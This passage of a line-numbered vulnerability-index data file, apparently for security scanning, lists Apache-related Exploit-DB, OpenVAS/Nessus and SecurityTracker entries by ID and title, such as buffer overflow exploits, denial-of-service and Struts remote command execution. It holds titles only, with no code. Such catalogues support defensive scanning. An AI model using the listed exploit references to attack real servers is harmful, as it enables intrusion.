8352| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
8353| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
8354| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
8355| [20558] Apache 1.2 Web Server DoS Vulnerability
8356| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
8357| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
8358| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
8359| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
8360| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
8361| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
8362| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
8363| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
8364| [19231] PHP apache_request_headers Function Buffer Overflow
8365| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
8366| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
8367| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
8368| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
8369| [18442] Apache httpOnly Cookie Disclosure
8370| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
8371| [18221] Apache HTTP Server Denial of Service
8372| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
8373| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
8374| [17691] Apache Struts < 2.2.0 - Remote Command Execution
8375| [16798] Apache mod_jk 1.2.20 Buffer Overflow
8376| [16782] Apache Win32 Chunked Encoding
8377| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
8378| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
8379| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
8380| [15319] Apache 2.2 (Windows) Local Denial of Service
8381| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
8382| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
8383| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
8384| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
8385| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
8386| [12330] Apache OFBiz - Multiple XSS
8387| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
8388| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
8389| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
8390| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
8391| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
8392| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
8393| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
8394| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
8395| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
8396| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
8397| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
8398| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
8399| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
8400| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
8401| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
8402| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
8403| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
8404| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
8405| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
8406| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
8407| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
8408| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
8409| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
8410| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
8411| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
8412| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
8413| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
8414| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
8415| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
8416| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
8417| [466] htpasswd Apache 1.3.31 - Local Exploit
8418| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
8419| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
8420| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
8421| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
8422| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
8423| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
8424| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
8425| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
8426| [9] Apache HTTP Server 2.x Memory Leak Exploit
8427|
8428| OpenVAS (Nessus) - http://www.openvas.org:
8429| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
8430| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
8431| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
8432| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
8433| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
8434| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
8435| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
8436| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
8437| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
8438| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
8439| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
8440| [900571] Apache APR-Utils Version Detection
8441| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
8442| [900496] Apache Tiles Multiple XSS Vulnerability
8443| [900493] Apache Tiles Version Detection
8444| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
8445| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
8446| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
8447| [870175] RedHat Update for apache RHSA-2008:0004-01
8448| [864591] Fedora Update for apache-poi FEDORA-2012-10835
8449| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
8450| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
8451| [864250] Fedora Update for apache-poi FEDORA-2012-7683
8452| [864249] Fedora Update for apache-poi FEDORA-2012-7686
8453| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
8454| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
8455| [855821] Solaris Update for Apache 1.3 122912-19
8456| [855812] Solaris Update for Apache 1.3 122911-19
8457| [855737] Solaris Update for Apache 1.3 122911-17
8458| [855731] Solaris Update for Apache 1.3 122912-17
8459| [855695] Solaris Update for Apache 1.3 122911-16
8460| [855645] Solaris Update for Apache 1.3 122912-16
8461| [855587] Solaris Update for kernel update and Apache 108529-29
8462| [855566] Solaris Update for Apache 116973-07
8463| [855531] Solaris Update for Apache 116974-07
8464| [855524] Solaris Update for Apache 2 120544-14
8465| [855494] Solaris Update for Apache 1.3 122911-15
8466| [855478] Solaris Update for Apache Security 114145-11
8467| [855472] Solaris Update for Apache Security 113146-12
8468| [855179] Solaris Update for Apache 1.3 122912-15
8469| [855147] Solaris Update for kernel update and Apache 108528-29
8470| [855077] Solaris Update for Apache 2 120543-14
8471| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
8472| [850088] SuSE Update for apache2 SUSE-SA:2007:061
8473| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
8474| [841209] Ubuntu Update for apache2 USN-1627-1
8475| [840900] Ubuntu Update for apache2 USN-1368-1
8476| [840798] Ubuntu Update for apache2 USN-1259-1
8477| [840734] Ubuntu Update for apache2 USN-1199-1
8478| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
8479| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
8480| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
8481| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
8482| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
8483| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
8484| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
8485| [835253] HP-UX Update for Apache Web Server HPSBUX02645
8486| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
8487| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
8488| [835236] HP-UX Update for Apache with PHP HPSBUX02543
8489| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
8490| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
8491| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
8492| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
8493| [835188] HP-UX Update for Apache HPSBUX02308
8494| [835181] HP-UX Update for Apache With PHP HPSBUX02332
8495| [835180] HP-UX Update for Apache with PHP HPSBUX02342
8496| [835172] HP-UX Update for Apache HPSBUX02365
8497| [835168] HP-UX Update for Apache HPSBUX02313
8498| [835148] HP-UX Update for Apache HPSBUX01064
8499| [835139] HP-UX Update for Apache with PHP HPSBUX01090
8500| [835131] HP-UX Update for Apache HPSBUX00256
8501| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
8502| [835104] HP-UX Update for Apache HPSBUX00224
8503| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
8504| [835101] HP-UX Update for Apache HPSBUX01232
8505| [835080] HP-UX Update for Apache HPSBUX02273
8506| [835078] HP-UX Update for ApacheStrong HPSBUX00255
8507| [835044] HP-UX Update for Apache HPSBUX01019
8508| [835040] HP-UX Update for Apache PHP HPSBUX00207
8509| [835025] HP-UX Update for Apache HPSBUX00197
8510| [835023] HP-UX Update for Apache HPSBUX01022
8511| [835022] HP-UX Update for Apache HPSBUX02292
8512| [835005] HP-UX Update for Apache HPSBUX02262
8513| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
8514| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
8515| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
8516| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
8517| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
8518| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
8519| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
8520| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
8521| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
8522| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
8523| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
8524| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
8525| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
8526| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
8527| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
8528| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
8529| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
8530| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
8531| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
8532| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
8533| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
8534| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
8535| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
8536| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
8537| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
8538| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
8539| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
8540| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
8541| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
8542| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
8543| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
8544| [801942] Apache Archiva Multiple Vulnerabilities
8545| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
8546| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
8547| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
8548| [801284] Apache Derby Information Disclosure Vulnerability
8549| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
8550| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
8551| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
8552| [800680] Apache APR Version Detection
8553| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
8554| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
8555| [800677] Apache Roller Version Detection
8556| [800279] Apache mod_jk Module Version Detection
8557| [800278] Apache Struts Cross Site Scripting Vulnerability
8558| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
8559| [800276] Apache Struts Version Detection
8560| [800271] Apache Struts Directory Traversal Vulnerability
8561| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
8562| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
8563| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
8564| [103122] Apache Web Server ETag Header Information Disclosure Weakness
8565| [103074] Apache Continuum Cross Site Scripting Vulnerability
8566| [103073] Apache Continuum Detection
8567| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
8568| [101023] Apache Open For Business Weak Password security check
8569| [101020] Apache Open For Business HTML injection vulnerability
8570| [101019] Apache Open For Business service detection
8571| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
8572| [100923] Apache Archiva Detection
8573| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
8574| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
8575| [100813] Apache Axis2 Detection
8576| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
8577| [100795] Apache Derby Detection
8578| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
8579| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
8580| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
8581| [100514] Apache Multiple Security Vulnerabilities
8582| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
8583| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
8584| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
8585| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
8586| [72626] Debian Security Advisory DSA 2579-1 (apache2)
8587| [72612] FreeBSD Ports: apache22
8588| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
8589| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
8590| [71512] FreeBSD Ports: apache
8591| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
8592| [71256] Debian Security Advisory DSA 2452-1 (apache2)
8593| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
8594| [70737] FreeBSD Ports: apache
8595| [70724] Debian Security Advisory DSA 2405-1 (apache2)
8596| [70600] FreeBSD Ports: apache
8597| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
8598| [70235] Debian Security Advisory DSA 2298-2 (apache2)
8599| [70233] Debian Security Advisory DSA 2298-1 (apache2)
8600| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
8601| [69338] Debian Security Advisory DSA 2202-1 (apache2)
8602| [67868] FreeBSD Ports: apache
8603| [66816] FreeBSD Ports: apache
8604| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
8605| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
8606| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
8607| [66081] SLES11: Security update for Apache 2
8608| [66074] SLES10: Security update for Apache 2
8609| [66070] SLES9: Security update for Apache 2
8610| [65998] SLES10: Security update for apache2-mod_python
8611| [65893] SLES10: Security update for Apache 2
8612| [65888] SLES10: Security update for Apache 2
8613| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
8614| [65510] SLES9: Security update for Apache 2
8615| [65472] SLES9: Security update for Apache
8616| [65467] SLES9: Security update for Apache
8617| [65450] SLES9: Security update for apache2
8618| [65390] SLES9: Security update for Apache2
8619| [65363] SLES9: Security update for Apache2
8620| [65309] SLES9: Security update for Apache and mod_ssl
8621| [65296] SLES9: Security update for webdav apache module
8622| [65283] SLES9: Security update for Apache2
8623| [65249] SLES9: Security update for Apache 2
8624| [65230] SLES9: Security update for Apache 2
8625| [65228] SLES9: Security update for Apache 2
8626| [65212] SLES9: Security update for apache2-mod_python
8627| [65209] SLES9: Security update for apache2-worker
8628| [65207] SLES9: Security update for Apache 2
8629| [65168] SLES9: Security update for apache2-mod_python
8630| [65142] SLES9: Security update for Apache2
8631| [65136] SLES9: Security update for Apache 2
8632| [65132] SLES9: Security update for apache
8633| [65131] SLES9: Security update for Apache 2 oes/CORE
8634| [65113] SLES9: Security update for apache2
8635| [65072] SLES9: Security update for apache and mod_ssl
8636| [65017] SLES9: Security update for Apache 2
8637| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
8638| [64783] FreeBSD Ports: apache
8639| [64774] Ubuntu USN-802-2 (apache2)
8640| [64653] Ubuntu USN-813-2 (apache2)
8641| [64559] Debian Security Advisory DSA 1834-2 (apache2)
8642| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
8643| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
8644| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
8645| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
8646| [64443] Ubuntu USN-802-1 (apache2)
8647| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
8648| [64423] Debian Security Advisory DSA 1834-1 (apache2)
8649| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
8650| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
8651| [64251] Debian Security Advisory DSA 1816-1 (apache2)
8652| [64201] Ubuntu USN-787-1 (apache2)
8653| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
8654| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
8655| [63565] FreeBSD Ports: apache
8656| [63562] Ubuntu USN-731-1 (apache2)
8657| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
8658| [61185] FreeBSD Ports: apache
8659| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
8660| [60387] Slackware Advisory SSA:2008-045-02 apache
8661| [58826] FreeBSD Ports: apache-tomcat
8662| [58825] FreeBSD Ports: apache-tomcat
8663| [58804] FreeBSD Ports: apache
8664| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
8665| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
8666| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
8667| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
8668| [57335] Debian Security Advisory DSA 1167-1 (apache)
8669| [57201] Debian Security Advisory DSA 1131-1 (apache)
8670| [57200] Debian Security Advisory DSA 1132-1 (apache2)
8671| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
8672| [57145] FreeBSD Ports: apache
8673| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
8674| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
8675| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
8676| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
8677| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
8678| [56067] FreeBSD Ports: apache
8679| [55803] Slackware Advisory SSA:2005-310-04 apache
8680| [55519] Debian Security Advisory DSA 839-1 (apachetop)
8681| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
8682| [55355] FreeBSD Ports: apache
8683| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
8684| [55261] Debian Security Advisory DSA 805-1 (apache2)
8685| [55259] Debian Security Advisory DSA 803-1 (apache)
8686| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
8687| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
8688| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
8689| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
8690| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
8691| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
8692| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
8693| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
8694| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
8695| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
8696| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
8697| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
8698| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
8699| [54439] FreeBSD Ports: apache
8700| [53931] Slackware Advisory SSA:2004-133-01 apache
8701| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
8702| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
8703| [53878] Slackware Advisory SSA:2003-308-01 apache security update
8704| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
8705| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
8706| [53848] Debian Security Advisory DSA 131-1 (apache)
8707| [53784] Debian Security Advisory DSA 021-1 (apache)
8708| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
8709| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
8710| [53735] Debian Security Advisory DSA 187-1 (apache)
8711| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
8712| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
8713| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
8714| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
8715| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
8716| [53282] Debian Security Advisory DSA 594-1 (apache)
8717| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
8718| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
8719| [53215] Debian Security Advisory DSA 525-1 (apache)
8720| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
8721| [52529] FreeBSD Ports: apache+ssl
8722| [52501] FreeBSD Ports: apache
8723| [52461] FreeBSD Ports: apache
8724| [52390] FreeBSD Ports: apache
8725| [52389] FreeBSD Ports: apache
8726| [52388] FreeBSD Ports: apache
8727| [52383] FreeBSD Ports: apache
8728| [52339] FreeBSD Ports: apache+mod_ssl
8729| [52331] FreeBSD Ports: apache
8730| [52329] FreeBSD Ports: ru-apache+mod_ssl
8731| [52314] FreeBSD Ports: apache
8732| [52310] FreeBSD Ports: apache
8733| [15588] Detect Apache HTTPS
8734| [15555] Apache mod_proxy content-length buffer overflow
8735| [15554] Apache mod_include priviledge escalation
8736| [14771] Apache <= 1.3.33 htpasswd local overflow
8737| [14177] Apache mod_access rule bypass
8738| [13644] Apache mod_rootme Backdoor
8739| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
8740| [12280] Apache Connection Blocking Denial of Service
8741| [12239] Apache Error Log Escape Sequence Injection
8742| [12123] Apache Tomcat source.jsp malformed request information disclosure
8743| [12085] Apache Tomcat servlet/JSP container default files
8744| [11438] Apache Tomcat Directory Listing and File disclosure
8745| [11204] Apache Tomcat Default Accounts
8746| [11092] Apache 2.0.39 Win32 directory traversal
8747| [11046] Apache Tomcat TroubleShooter Servlet Installed
8748| [11042] Apache Tomcat DOS Device Name XSS
8749| [11041] Apache Tomcat /servlet Cross Site Scripting
8750| [10938] Apache Remote Command Execution via .bat files
8751| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
8752| [10773] MacOS X Finder reveals contents of Apache Web files
8753| [10766] Apache UserDir Sensitive Information Disclosure
8754| [10756] MacOS X Finder reveals contents of Apache Web directories
8755| [10752] Apache Auth Module SQL Insertion Attack
8756| [10704] Apache Directory Listing
8757| [10678] Apache /server-info accessible
8758| [10677] Apache /server-status accessible
8759| [10440] Check for Apache Multiple / vulnerability
8760|
8761| SecurityTracker - https://www.securitytracker.com:
8762| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
8763| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
8764| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
8765| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
8766| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
8767| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
8768| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
8769| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
8770| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
8771| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
8772| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
8773| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
8774| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
8775| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
8776| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
8777| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
8778| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
8779| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
8780| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
8781| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
8782| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
8783| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
8784| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
8785| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
8786| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
8787| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
8788| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
8789| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
8790| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
8791| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
8792| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
8793| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
8794| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
8795| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
8796| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
8797| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
8798| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
8799| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
8800| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
8801| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
